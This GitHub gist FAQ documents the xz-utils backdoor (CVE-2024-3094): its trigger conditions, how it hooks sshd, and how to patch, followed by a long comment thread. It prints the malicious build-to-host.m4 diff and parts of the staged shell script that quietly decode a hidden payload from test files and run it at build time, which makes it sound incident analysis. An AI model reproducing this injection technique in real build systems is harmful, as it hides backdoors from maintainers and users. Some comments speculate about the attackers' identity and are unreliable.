Skip to content

Instantly share code, notes, and snippets.

@thesamesam
Last active December 22, 2024 23:00
Show Gist options
  • Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
Save thesamesam/223949d5a074ebc3dce9ee78baad9e27 to your computer and use it in GitHub Desktop.
xz-utils backdoor situation (CVE-2024-3094)

FAQ on the xz-utils backdoor (CVE-2024-3094)

This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.

Background

On March 29th, 2024, a backdoor was discovered in xz-utils, a suite of software that gives developers lossless compression. This package is commonly used for compressing release tarballs, software packages, kernel images, and initramfs images. It is very widely distributed, statistically your average Linux or macOS system will have it installed for convenience.

This backdoor is very indirect and only shows up when a few known specific criteria are met. Others may be yet discovered! However, this backdoor is at least triggerable by remote unprivileged systems connecting to public SSH ports. This has been seen in the wild where it gets activated by connections - resulting in performance issues, but we do not know yet what is required to bypass authentication (etc) with it.

We're reasonably sure the following things need to be true for your system to be vulnerable:

  • You need to be running a distro that uses glibc (for IFUNC)
  • You need to have versions 5.6.0 or 5.6.1 of xz or liblzma installed (xz-utils provides the library liblzma) - likely only true if running a rolling-release distro and updating religiously.

We know that the combination of systemd and patched openssh are vulnerable but pending further analysis of the payload, we cannot be certain that other configurations aren't.

While not scaremongering, it is important to be clear that at this stage, we got lucky, and there may well be other effects of the infected liblzma.

If you're running a publicly accessible sshd, then you are - as a rule of thumb for those not wanting to read the rest here - likely vulnerable.

If you aren't, it is unknown for now, but you should update as quickly as possible because investigations are continuing.

TL:DR:

  • Using a .deb or .rpm based distro with glibc and xz-5.6.0 or xz-5.6.1:
    • Using systemd on publicly accessible ssh: update RIGHT NOW NOW NOW
    • Otherwise: update RIGHT NOW NOW but prioritize the former
  • Using another type of distribution:
    • With glibc and xz-5.6.0 or xz-5.6.1: update RIGHT NOW, but prioritize the above.

If all of these are the case, please update your systems to mitigate this threat. For more information about affected systems and how to update, please see this article or check the xz-utils page on Repology.

This is not a fault of sshd, systemd, or glibc, that is just how it was made exploitable.

Design

This backdoor has several components. At a high level:

  • The release tarballs upstream publishes don't have the same code that GitHub has. This is common in C projects so that downstream consumers don't need to remember how to run autotools and autoconf. The version of build-to-host.m4 in the release tarballs differs wildly from the upstream on GitHub.
  • There are crafted test files in the tests/ folder within the git repository too. These files are in the following commits:
  • Note that the bad commits have since been reverted in e93e13c8b3bec925c56e0c0b675d8000a0f7f754
  • A script called by build-to-host.m4 that unpacks this malicious test data and uses it to modify the build process.
  • IFUNC, a mechanism in glibc that allows for indirect function calls, is used to perform runtime hooking/redirection of OpenSSH's authentication routines. IFUNC is a tool that is normally used for legitimate things, but in this case it is exploited for this attack path.

Normally upstream publishes release tarballs that are different than the automatically generated ones in GitHub. In these modified tarballs, a malicious version of build-to-host.m4 is included to execute a script during the build process.

This script (at least in versions 5.6.0 and 5.6.1) checks for various conditions like the architecture of the machine. Here is a snippet of the malicious script that gets unpacked by build-to-host.m4 and an explanation of what it does:

if ! (echo "$build" | grep -Eq "^x86_64" > /dev/null 2>&1) && (echo "$build" | grep -Eq "linux-gnu$" > /dev/null 2>&1);then

  • If amd64/x86_64 is the target of the build
  • And if the target uses the name linux-gnu (mostly checks for the use of glibc)

It also checks for the toolchain being used:

  if test "x$GCC" != 'xyes' > /dev/null 2>&1;then
  exit 0
  fi
  if test "x$CC" != 'xgcc' > /dev/null 2>&1;then
  exit 0
  fi
  LDv=$LD" -v"
  if ! $LDv 2>&1 | grep -qs 'GNU ld' > /dev/null 2>&1;then
  exit 0

And if you are trying to build a Debian or Red Hat package:

if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then

This attack thusly seems to be targeted at amd64 systems running glibc using either Debian or Red Hat derived distributions. Other systems may be vulnerable at this time, but we don't know.

Lasse Collin, the original long-standing xz maintainer, is currently working on auditing the xz.git.

Design specifics

$ git diff m4/build-to-host.m4 ~/data/xz/xz-5.6.1/m4/build-to-host.m4
diff --git a/m4/build-to-host.m4 b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
index f928e9ab..d5ec3153 100644
--- a/m4/build-to-host.m4
+++ b/home/sam/data/xz/xz-5.6.1/m4/build-to-host.m4
@@ -1,4 +1,4 @@
-# build-to-host.m4 serial 3
+# build-to-host.m4 serial 30
 dnl Copyright (C) 2023-2024 Free Software Foundation, Inc.
 dnl This file is free software; the Free Software Foundation
 dnl gives unlimited permission to copy and/or distribute it,
@@ -37,6 +37,7 @@ AC_DEFUN([gl_BUILD_TO_HOST],
 
   dnl Define somedir_c.
   gl_final_[$1]="$[$1]"
+  gl_[$1]_prefix=`echo $gl_am_configmake | sed "s/.*\.//g"`
   dnl Translate it from build syntax to host syntax.
   case "$build_os" in
     cygwin*)
@@ -58,14 +59,40 @@ AC_DEFUN([gl_BUILD_TO_HOST],
   if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
     [$1]_c_make='\"$([$1])\"'
   fi
+  if test "x$gl_am_configmake" != "x"; then
+    gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
+  else
+    gl_[$1]_config=''
+  fi
+  _LT_TAGDECL([], [gl_path_map], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_prefix], [2])dnl
+  _LT_TAGDECL([], [gl_am_configmake], [2])dnl
+  _LT_TAGDECL([], [[$1]_c_make], [2])dnl
+  _LT_TAGDECL([], [gl_[$1]_config], [2])dnl
   AC_SUBST([$1_c_make])
+
+  dnl If the host conversion code has been placed in $gl_config_gt,
+  dnl instead of duplicating it all over again into config.status,
+  dnl then we will have config.status run $gl_config_gt later, so it
+  dnl needs to know what name is stored there:
+  AC_CONFIG_COMMANDS([build-to-host], [eval $gl_config_gt | $SHELL 2>/dev/null], [gl_config_gt="eval \$gl_[$1]_config"])
 ])
 
 dnl Some initializations for gl_BUILD_TO_HOST.
 AC_DEFUN([gl_BUILD_TO_HOST_INIT],
 [
+  dnl Search for Automake-defined pkg* macros, in the order
+  dnl listed in the Automake 1.10a+ documentation.
+  gl_am_configmake=`grep -aErls "#{4}[[:alnum:]]{5}#{4}$" $srcdir/ 2>/dev/null`
+  if test -n "$gl_am_configmake"; then
+    HAVE_PKG_CONFIGMAKE=1
+  else
+    HAVE_PKG_CONFIGMAKE=0
+  fi
+
   gl_sed_double_backslashes='s/\\/\\\\/g'
   gl_sed_escape_doublequotes='s/"/\\"/g'
+  gl_path_map='tr "\t \-_" " \t_\-"'
 changequote(,)dnl
   gl_sed_escape_for_make_1="s,\\([ \"&'();<>\\\\\`|]\\),\\\\\\1,g"
 changequote([,])dnl

Payload

If those conditions check, the payload is injected into the source tree. We have not analyzed this payload in detail. Here are the main things we know:

  • The payload activates if the running program has the process name /usr/sbin/sshd. Systems that put sshd in /usr/bin or another folder may or may not be vulnerable.

  • It may activate in other scenarios too, possibly even unrelated to ssh.

  • We don't entirely know the payload is intended to do. We are investigating.

  • Successful exploitation does not generate any log entries.

  • Vanilla upstream OpenSSH isn't affected unless one of its dependencies links liblzma.

    • Lennart Poettering had mentioned that it may happen via pam->libselinux->liblzma, and possibly in other cases too, but...
    • libselinux does not link to liblzma. It turns out the confusion was because of an old downstream-only patch in Fedora and a stale dependency in the RPM spec which persisted long-beyond its removal.
    • PAM modules are loaded too late in the process AFAIK for this to work (another possible example was pam_fprintd). Solar Designer raised this issue as well on oss-security.
  • The payload is loaded into sshd indirectly. sshd is often patched to support systemd-notify so that other services can start when sshd is running. liblzma is loaded because it's depended on by other parts of libsystemd. This is not the fault of systemd, this is more unfortunate. The patch that most distributions use is available here: openssh/openssh-portable#375.

    • Update: The OpenSSH developers have added non-library integration of the systemd-notify protocol so distributions won't be patching it in via libsystemd support anymore. This change has been committed and will land in OpenSSH-9.8, due around June/July 2024.
  • If this payload is loaded in openssh sshd, the RSA_public_decrypt function will be redirected into a malicious implementation. We have observed that this malicious implementation can be used to bypass authentication. Further research is being done to explain why.

    • Filippo Valsorda has shared analysis indicating that the attacker must supply a key which is verified by the payload and then attacker input is passed to system(), giving remote code execution (RCE).

Tangential xz bits

  • Jia Tan's 328c52da8a2bbb81307644efdb58db2c422d9ba7 commit contained a . in the CMake check for landlock sandboxing support. This caused the check to always fail so landlock support was detected as absent.

    • Hardening of CMake's check_c_source_compiles has been proposed (see Other projects).
  • IFUNC was introduced for crc64 in ee44863ae88e377a5df10db007ba9bfadde3d314 by Hans Jansen.

    • Hans Jansen later went on to ask Debian to update xz-utils in https://bugs.debian.org/1067708, but this is quite a common thing for eager users to do, so it's not necessarily nefarious.

People

We do not want to speculate on the people behind this project in this document. This is not a productive use of our time, and law enforcement will be able to handle identifying those responsible. They are likely patching their systems too.

xz-utils had two maintainers:

  • Lasse Collin (Larhzu) who has maintained xz since the beginning (~2009), and before that, lzma-utils.
  • Jia Tan (JiaT75) who started contributing to xz in the last 2-2.5 years and gained commit access, and then release manager rights, about 1.5 years ago. He was removed on 2024-03-31 as Lasse begins his long work ahead.

Lasse regularly has internet breaks and was on one of these as this all kicked off. He has posted an update at https://tukaani.org/xz-backdoor/ and is working with the community.

Please be patient with him as he gets up to speed and takes time to analyse the situation carefully.

Misc notes

Analysis of the payload

This is the part which is very much in flux. It's early days yet.

These two especially do a great job of analysing the initial/bash stages:

Other great resources:

Other projects

There are concerns some other projects are affected (either by themselves or changes to other projects were made to facilitate the xz backdoor). I want to avoid a witch-hunt but listing some examples here which are already been linked widely to give some commentary.

Tangential efforts as a result of this incident

This is for suggesting specific changes which are being considered as a result of this.

Discussions in the wake of this

This is for linking to interesting general discussions, rather than specific changes being suggested (see above).

Non-mailing list proposals:

Acknowledgements

  • Andres Freund who discovered the issue and reported it to linux-distros and then oss-security.
  • All the hard-working security teams helping to coordinate a response and push out fixes.
  • Xe Iaso who resummarized this page for readability.
  • Everybody who has provided me tips privately, in #tukaani, or in comments on this gist.

Meta

Please try to keep comments on the gist constrained to editorial changes I need to make, new sources, etc.

There are various places to theorise & such, please see e.g. https://discord.gg/TPz7gBEE (for both, reverse engineering and OSint). (I'm not associated with that Discord but the link is going around, so...)

Response to questions

  • A few people have asked why Jia Tan followed me (@thesamesam) on GitHub. #tukaani was a small community on IRC before this kicked off (~10 people, currently has ~350). I've been in #tukaani for a few years now. When the move from self-hosted infra to github was being planned and implemented, I was around and starred & followed the new Tukaani org pretty quickly.

  • I'm referenced in one of the commits in the original oss-security post that works around noise from the IFUNC resolver. This was a legitimate issue which applies to IFUNC resolvers in general. The GCC bug it led to (PR114115) has been fixed.

    • On reflection, there may have been a missed opportunity as maybe I should have looked into why I couldn't hit the reported Valgrind problems from Fedora on Gentoo, but this isn't the place for my own reflections nor is it IMO the time yet.

TODO for this doc

  • Add a table of releases + signer?
  • Include the injection script after the macro
  • Mention detection?
  • Explain the bug-autoconf thing maybe wrt serial
  • Explain dist tarballs, why we use them, what they do, link to autotools docs, etc
    • "Explaining the history of it would be very helpful I think. It also explains how a single person was able to insert code in an open source project that no one was able to peer review. It is pragmatically impossible, even if technically possible once you know the problem is there, to peer review a tarball prepared in this manner."

TODO overall

Anyone can and should work on these. I'm just listing them so people have a rough idea of what's left.

  • Ensuring Lasse Collin and xz-utils is supported, even long after the fervour is over
  • Reverse engineering the payload (it's still fairly early days here on this)
    • Once finished, tell people whether:
      • the backdoor did anything else than waiting for connections for RCE, like:
        • call home (send found private keys, etc)
        • load/execute additional rogue code
        • did some other steps to infest the system (like adding users, authorized_keys, etc.) or whether it can be certainly said, that it didn't do so
      • other attack vectors than via sshd were possible
      • whether people (who had the compromised versions) can feel fully safe if they either had sshd not running OR at least not publicly accessible (e.g. because it was behind a firewall, nat, iptables, etc.)
  • Auditing all possibly-tainted xz-utils commits
  • Investigate other paths for sshd to get liblzma in its process (not just via libsystemd, or at least not directly)
    • This is already partly done and it looks like none exist, but it would be nice to be sure.
  • Checking other projects for similar injection mechanisms (e.g. similar build system lines)
  • Diff and review all "golden" upstream tarballs used by distros against the output of creating a tarball from the git tag for all packages.
  • Check other projecs which (recently) introduced IFUNC, as suggested by thegrugq.
    • This isn't a bad idea even outside of potential backdoors, given how brittle IFUNC is.
  • ???

References and other reading material

@n1x3n
Copy link

n1x3n commented Apr 1, 2024

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?
That's quite a lot of time for modern CPU. Even though backdoor uses sophisticated obfuscation, the logic reversed so far doesn't seem to involve any heavy number crunching. And considering that slowdown applies even when sshd is started with "-h", there isn't even cryptography involved.

I've been only passively watching this thread since it has a lot of non-technical craziness in it, but indeed this is a point that bothered me as well. 500ms is really, really a lot, especially for compiled code.
I find it somewhat strange that someone/some group that clearly has a lot of know-how based on how real-looking the commits that introduce the backdoor are, but not being able to make this half-invisible for anyone that is not debugging this knowing already what to look for. Almost as if the person in charge for launching the back door had different knowledge/standards than the person introducing it.
Well, will be a good read once the dust settles.

Same reason as people who know they should make some information half invisible to anyone debugging their backdoor at times still choose to converse about it in public forums because they think no one will understand the convo without insider information. Everyone has lapses and get sloppy at times, Jia Tan is just a person like we all.

^== Is exactly this conversing about it in public forums? ;) (Sorry, just somehow got cicada-vibes because of your ~5hrs old account. :))

Anyways, as I understand from Andres Freunds message on oss-security, parsing the symbol tables in memory was the quite slow step in the malware code which made him initially look into that. Maybe that's where the ~0.5s are spent.

@christoofar
Copy link

christoofar commented Apr 1, 2024

A word bout Jia's commits to the base lib itself:

I have spent a good deal of my working career keeping high-level code going with C/C++ deplibs (and whole programs that take on a job step) that, once they've proven their mettle in production, nobody cares to touch. Sometimes re-writes are needed in the C source, but typically they are done with a good motivating reason.

Jia pumped out a shitstorm of commits and introduced two advertised features: RISCV support and multithread decomp. A shitton of his commits however are around moving to a modern buildstream from a project that followed the old pattern of C projects: the nasty autoconf, an even nastier Makefile, a patternless approach to tests, etc---and moving all that around in a big CMake refactor, tons of commits to change static-but-commented numbers and defines over to enums, .po ing the code everywhere, and whole moveouts and relocations of functionality (what Lasse put into file_io.c for sandbox, moving over to sandbox.c), etc.

It's just a lot of activity to be doing for what arguably are just not big features... and wouldn't you want to get the features out, at least the simple RISCV one that's mostly a copypasta job (which is what he did, look at the increment-assign statements where the arithmetic is written out without any comment, which is what Lasse did elsewhere earlier in the history) and then pull them back into a mega-cleanup-branch anyway?

I would think if you cared so much about readability of the top-line constants that you would give a shit about the meat-and-potatoes part of the code where there's whole stretches of uncommented bitmath.

I feel Lasse should just wipe out and rebase back to pre-Jia because so much trust is shaken by the autotools shenanigans that Jia's refactoring work should be thrown in the trash. I don't think he poisoned up the baselib, it's just part of the social engineering mainly to fool Lasse. If anything, a legit volunteer who wants to contribute now has a ready-done refactoring that can be examined line by line, day by day, and re-decided if it was worth it or Jia was just generating commit noise.

I guess for FOSS crews one lesson is this: Someone wants to onboard because feature X is not there? Great. Welcome to the team. Go henceforth and finish it in your own branch. Oh, you decided that the code is too ugly/puts out a storm of warnings and you prefer quiet compiles? Great! Another branch for you. Let's keep stable going and backport the commits to the cleanup branch! Wait... why do you need to screw around in the autotool scripts? Can we isolate that need to the specific feature commits involved so the commits that put on the feature also have the script changes, because ac scripts are a nightmare and delicate?

Sole-maintainer handing off to an anon-sole-maintainer? Well, what choice do the users have other than marking the last stable commit good and everything else sus until some trusted people come to do a drive-by vouch? All the people linking direct to the build thought they were being helpful busy beavers keeping their dependencies from going stale and risking compat problems didn't know what Jia was up to.

And I'm not even going to get into what I think of systemd architecture (oh good, you're going to dynload now. golf clap) because that's a whole international Come To Jesus™ meeting that needs to happen and I need to take my arthritis medication. (Spare me with the tone-policing surrounding libsystemd, it was "this is good for you take the medicine" adoption, it fixes so much operations architecture just do it, etc etc. Now here we are kvetching about systemd architecture.)

@mikebveil
Copy link

mikebveil commented Apr 2, 2024

I've seen this being shared as a POC, can anyone confirm? https://github.com/amlweems/xzbot

Looks legit to me, but note that the backdoor can only be exploited by the owner of the attacker's Ed448 private key. xzbot patches libxzma with a different key, so that people can experiment with triggering the exploit in a sandboxed environment. That's all.

@gonoph
Copy link

gonoph commented Apr 2, 2024

One thing I would like folks to deeply consider is the social engineering that went on, either maliciously or inadvertently.

The May 2022 message from Dennis Ens added some soft pressure to Lasse to implement some changes. Then, ~3 weeks later, Jigar Kumar adds several replies that are aggressive and borderline abusive to Lasse.

We again see this type of pressure 2 years later, when krygorin4545 pressures debian package maintainers to adopt a NMU version bump of xz-utils.

Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn't done an upload in 5 years.

Fedora considered this a serious bug and fixed it weeks ago

Evan Boehs' summary (you have linked above) has some interesting timelines about this interaction.

The social engineering aspect of this was mentioned on a mastodon thread, which I think every project contributor should take to heart:

RT Carol (Nichols || Goulding) ꙮ @carol@crabby.fyi

the lesson I'm choosing to take from xz, as an oss maintainer, is that anyone trying to pressure or guilt me into doing something should immediately be told no, for security reasons

RT mybarkingdogs @mybarkingdogs@freeradical.zone

@ carol This is literally a good lesson for EVERYONE in anything, not even just software.

Giving into pressure/guilt is DANGEROUS

In personal relationships, it's one of the worst mistakes: it tells an abuser/manipulator you're a target.

In anything financial, it's often a baited hook for a scam

In politics it gets you pulled into anything from outright far-right fascist bullshit like qanon to "left" (but not really left, obviously!) groups that are state-sponsored ops or personality cults

@gh-nate
Copy link

gh-nate commented Apr 2, 2024

@thesamesam
Copy link
Author

@gh-nate That looks wonderful. I'll add it now.

@thesamesam
Copy link
Author

@thijskh Fixing, thanks!

@dong-zeyu
Copy link

I believe Jia used a similar trick when first introducing the IFUNC implementation. User hansjans162 (I suspect it's just another identity of Jia) created the PR for IFUNC implementation instead of Jia himself, and Jia was below to emphasis the importance and made many suggestions. Then the situation became 2:1 and made Larhzu harder to refuse the PR even though he raised some concerns.

In a more general perspective, most maintainers will (implicitly) rate the importance of an issue/PR by the number of comments/upvotes/watches/etc. So an attacker can easily create some dummy identities to increase the exposure of the issue to the maintainers (like how Debian package maintainers were pressured) and even affect the decision of the maintainers.

@imv7
Copy link

imv7 commented Apr 2, 2024

ja existe automacao pra achar esses padroes de vulnerabilidades por todas as bibliotecas. como tb ja existe vulnerabilidades na blockchain, mas nada disso foi revelado ainda.

@orbea
Copy link

orbea commented Apr 2, 2024

I just want to point out that this exploit may not represent a single bad actor, but it could be an organized group of collaborators. Even a single username can be possibly shared by multiple different people.

@daniel-dona
Copy link

Just sharing this funny commit "Simplify SECURITY.md"...

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=af071ef7702debef4f1d324616a0137a5001c14c

-While both options are available, we prefer email. In any case, please
-provide a clear description of the vulnerability including:
-
-- Affected versions of XZ Utils
-- Estimated severity (low, moderate, high, critical)
-- Steps to recreate the vulnerability
-- All relevant files (core dumps, build logs, input files, etc.)
+While both options are available, we prefer email.

@NuLL3rr0r
Copy link

Just sharing this funny commit "Simplify SECURITY.md"...

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=af071ef7702debef4f1d324616a0137a5001c14c

-While both options are available, we prefer email. In any case, please
-provide a clear description of the vulnerability including:
-
-- Affected versions of XZ Utils
-- Estimated severity (low, moderate, high, critical)
-- Steps to recreate the vulnerability
-- All relevant files (core dumps, build logs, input files, etc.)
+While both options are available, we prefer email.

Lol, best commit message I've ever seen! Terse and to the point.

@shide1989
Copy link

JIA CHEONG TAN CIA JHEONG TAN CIA JHON EGTAN CIA JOHN AGENT CIA AGENT JOHN Case closed

💯

@thesamesam
Copy link
Author

Please try to keep the comments on this gist for new resources which need to be added to the doc, corrections, edits, or questions which appear not answered elsewhere. Thanks!

@ldarby2
Copy link

ldarby2 commented Apr 2, 2024

@thesamesam about the italics idea for new content, please don't, it's better if people just watch the changlog of this document: https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27/revisions. The italics would need to be undone as they become older and that also puts changes into the changelog. Thanks.

@thesamesam
Copy link
Author

thesamesam commented Apr 2, 2024

@ldarby2 OK, thanks for the feedback!

@flybyray
Copy link

flybyray commented Apr 2, 2024

I pass all my day as read thread about this "attack", because it's not a vulnerability, it's an "attack" against OpenSources community.

Most people expressed their outrage but only less were aware what was really going on!

Modify code to inject payload from unittest "corrupted file", it's needs big knowledge. Target XZ when we know it's most usefull algorithme for compression and used directly in Linux kernel, this is not random.

At the time of writing this comment - only 2 occurences of the word "kernel" on this page. I will add another reference to the actual target of this supply chain attack.

consider xz binary provided via package would have integrated the blob and would be able to detect the generic build environment. the eval here:
https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/xz_wrap.sh?h=next-20240328#n36
could do harm for the generic vanilla kernel builds.
It would be called from here: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/Makefile.lib?h=next-20240328#n528 ask your self why they used sh as a pipe target and not as others (KBZIP2,LZMA,ZSTD,...) the tool itself. the shell process will populate a lot more background information useful to activate the payload injections.

as this is just commited short before public announcment of this CVE, we might just anticipate the time pressure on the attackers side. i guess they detected on their own the valgrind issues and that hteir buggy payload is already out. hence they were on time pressure to push things into the kernel world

https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/diff/?h=next-20240328&id2=757ea48c7452355bab0d0827cfa0b16f4fd780d8

@Gasu16
Copy link

Gasu16 commented Apr 2, 2024

This is a great resource and references most of the stuff I've found researching this myself so far. Great stuff.

I found a repo earlier by user @amlweems that has a very interesting write-up and project where he is prodding the payload called xzbot, where he has done some reverse engineering on it. Seems to heavily imply that this was supposed to be RCE when receiving a specific ED448 key payload.

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?

This is just speculation on my part, but maybe waiting and scanning for detection of the key was part of why it caused such a delay in the sshd login process.

When the crc64_resolve() is invoked, it starts performing a check on various data from the dynamic linker, program arguments and additional checks on the environment.
After that, it starts to parsing the symbol tables in memory, this seems to be the issue which raises the 500ms lag on the ssh authentication flow

@dfl23
Copy link

dfl23 commented Apr 2, 2024

Same reason as people who know they should make some information half invisible to anyone debugging their backdoor at times still choose to converse about it in public forums because they think no one will understand the convo without insider information. Everyone has lapses and get sloppy at times, Jia Tan is just a person like we all.

Is he now ?
You're making a guess here.

Could be a single person, could be 3, could be a whole team.
Could be CIA, could be PRC...

@makotom
Copy link

makotom commented Apr 2, 2024

@Z-nonymous Thanks for your review! I have one thing to underline here - as @Artoria2e5 says:

recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64.

That means, AIUI, your third example never happens in terms of shell scripts, and instead we need to review the case where build is undefined to emulate non-AMD64 situations.

// That being said I understand there are enough other signals suggesting that glibc-based systems on AMD64 were targeted. Just being noisy in case I'm on a wrong understanding - apologies! 🙇

@thesamesam
Copy link
Author

(Sorry, I haven't had a chance to play with this, I did spin up a VM but I've been shattered. I still have the notes open and plan on poking.)

@fungilife
Copy link

fungilife commented Apr 2, 2024

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresposnible those who were unaffected?
Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not).
You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

@Z-nonymous
Copy link

@Z-nonymous Thanks for your review! I have one thing to underline here - as @Artoria2e5 says:

recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64.

That means, AIUI, your third example never happens in terms of shell scripts, and instead we need to review the case where build is undefined to emulate non-AMD64 situations.

Yes, it could be an attempt to make it harder to identify what platform is target / protected though.

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single com‐
mand. This command is then read and executed by the shell, and
its exit status is returned as the value of eval. If there are
no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation or the real excempted targets.

Insert a Drake meme with "RCE on all Linuxes" vs "RCE on all Linux but the plaform I use"

@gh-nate
Copy link

gh-nate commented Apr 2, 2024

A walkthrough of the xz attack shell script.
An RC4 variant in Awk, what more could you want?
https://research.swtch.com/xz-scripthttps://hachyderm.io/@rsc/112200603337903320

@xry111
Copy link

xry111 commented Apr 2, 2024

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single com‐
mand. This command is then read and executed by the shell, and
its exit status is returned as the value of eval. If there are
no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation or the real excempted targets.

No. The code is:

eval `grep ^build=\'x86_64 config.status`

From info bash:

3.5.4 Command Substitution

Command substitution allows the output of a command to replace the
command itself. Command substitution occurs when a command is enclosed
as follows:

$(COMMAND)

or

`COMMAND`

Bash performs the expansion by executing COMMAND in a subshell
environment and replacing the command substitution with the standard
output of the command, with any trailing newlines deleted.

So after command substitution it becomes:

eval build='x86_64-pc-linux-gnu'

And yes the exit code is still discarded, but the command build='x86_64-pc-linux-gnu' is still executed by the shell. You can try an example:

cat > config.status << EOF
unrelated_thing_1='114514'
build='x86_64-linux-gnu'
unrelated_thing_2='1919810'
EOF

eval `grep ^build=\'x86_64 config.status`
echo $build

It will output x86_64-linux-gnu. So this line is not a no-op, it basically reads the variable "build" out of config.status.

@erinacio
Copy link

erinacio commented Apr 2, 2024

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresposnible those who were unaffected? Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not). You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

You just misinterpreted what I means. Even a simple notice like "We're not affected." is sufficient in such case. A more comprehensive notice (like what Arch did) could be better, but not strictly required.

I think it's a basic responsibility for a distro maintainer to publish such notice. I didn't mean and never mean Debian or Red Hat or anything is superior and users should switch to them. Just because they're affected and they have a wide user adoption I took them as examples. openSUSE also published a great guide and was affected but because it seems to have less adoption I didn't list it in my original comment.

Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl?

Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

@Osiris-Team
Copy link

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

@Artoria2e5
Copy link

Artoria2e5 commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it shipped backdoored versions in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.) There is a clarification that libsystemd is not present, so it could not have affected sshd, but it's not the same level of assurance as "the code is simply not there".


@Osiris-Team XZ for Java is not known to be affected by this backdoor. It's not as easy to hide bad things in pure Java code...

@Gasu16
Copy link

Gasu16 commented Apr 2, 2024

What about xz for Java (https://mvnrepository.com/artifact/org.tukaani/xz), is it safe?

It still considered to be safe at the moment, the latest commit have been done by the original authors, Jia Tan committed in January 2024, updating the README for bug report

https://git.tukaani.org/?p=xz-java.git;a=shortlog;pg=0
https://blog.sonatype.com/cve-2024-3094-the-targeted-backdoor-supply-chain-attack-against-xz-and-liblzma
https://security.apache.org/blog/cve-2024-3094/

@erinacio
Copy link

erinacio commented Apr 2, 2024

@erinacio
Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.
Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as what I said, responsible distros will publish such notices.

Arch Linux is the opposite: it incorrectly states that it's affected in https://archlinux.org/news/the-xz-package-has-been-backdoored/. Binary diff by Felix Yan shows that only the build id changed between 5.6.1-1 (made from the bad tarball) and 5.6.1-2 (made from git tag).

Maybe @​dvzrv can fix this? (I hope this doesn't cause him to subscribe automatically, because this is a high-traffic thread.)

Well I think a false-positive is tolerable in such case, especially given that the last section of the notice indicated that Arch might not be affected due to liblzma not dynamically linked to sshd. At that time we just didn't have enough understand about the backdoor. It was annoying but won't cause real damage, in contrast of a false-negative.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment